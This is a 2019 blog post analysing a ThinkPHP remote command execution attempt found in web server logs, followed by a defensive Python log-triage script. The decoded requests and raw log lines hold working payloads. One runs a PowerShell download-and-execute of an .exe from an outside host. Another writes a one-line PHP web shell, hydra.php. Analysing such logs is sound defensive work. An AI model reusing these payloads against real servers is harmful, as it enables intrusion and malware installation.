Tuesday, February 19, 2019

Learning System Vulnerabilities from Web Logs 35

ThinkPHP Remote Command Execution Vulnerability

The commands executed, after decoding:
1. /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe
2. /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php
3. /public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe


I don't know why it needs to download the same thing twice.


41.228.75.23 - - [18/Feb/2019:21:49:44 +0800] "GET /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
41.228.75.23 - - [18/Feb/2019:21:49:45 +0800] "GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
41.228.75.23 - - [18/Feb/2019:21:49:45 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start%20C:/10.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
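
The triage done by hand above can be scripted. The following is an added example, not code from the original post: it URL-decodes each access log line, flags the ThinkPHP invokefunction route, and then watches for later requests to any .php file the injected command tried to create. The function name `triage`, the regexes and the sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format fields we need: client IP, timestamp, request URL, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (.*?) HTTP/[\d.]+" (\d{3}) ')
# Decoded route seen in the log above, with or without the leading "/" and "\".
PROBE_RE = re.compile(r'[?&]s=/?index/\\?think\\app/invokefunction', re.I)
# Shell redirection into a .php file inside the injected command (">name.php").
DROP_RE = re.compile(r'>\s*([\w.-]+\.php)\b', re.I)

# Constructed sample lines (documentation IPs, harmless payload), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /public/index.php?s=/index/'
    '%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system'
    '&vars%5B1%5D%5B%5D=echo%20test%3Eprobe.php HTTP/1.1" 404 214 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] '
    '"GET /public/probe.php?xcmd=whoami HTTP/1.1" 404 214 "-" "-"',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] '
    '"GET /public/index.php?s=index/index HTTP/1.1" 200 512 "-" "-"',
]

def triage(lines):
    """Return one finding per suspicious request, in log order."""
    findings, dropped = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format access log line
        ip, ts, raw_url, status = m.groups()
        url = unquote(raw_url)  # %5C -> "\", %5B -> "[", %3E -> ">"
        path, _, query = url.partition("?")
        if PROBE_RE.search(url):
            kind = "thinkphp-invokefunction"
            # Remember any file the injected command tried to create.
            dropped.update(name.lower() for name in DROP_RE.findall(query))
        elif path.rsplit("/", 1)[-1].lower() in dropped:
            kind = "dropped-file-request"
        else:
            continue
        findings.append({"ip": ip, "time": ts, "kind": kind,
                         "status": int(status), "served": status.startswith("2")})
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f)
```

Every request in the log above returned 404, so `served` would be false for all three; a 2xx status on either kind of finding is the case that needs investigation on the host.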

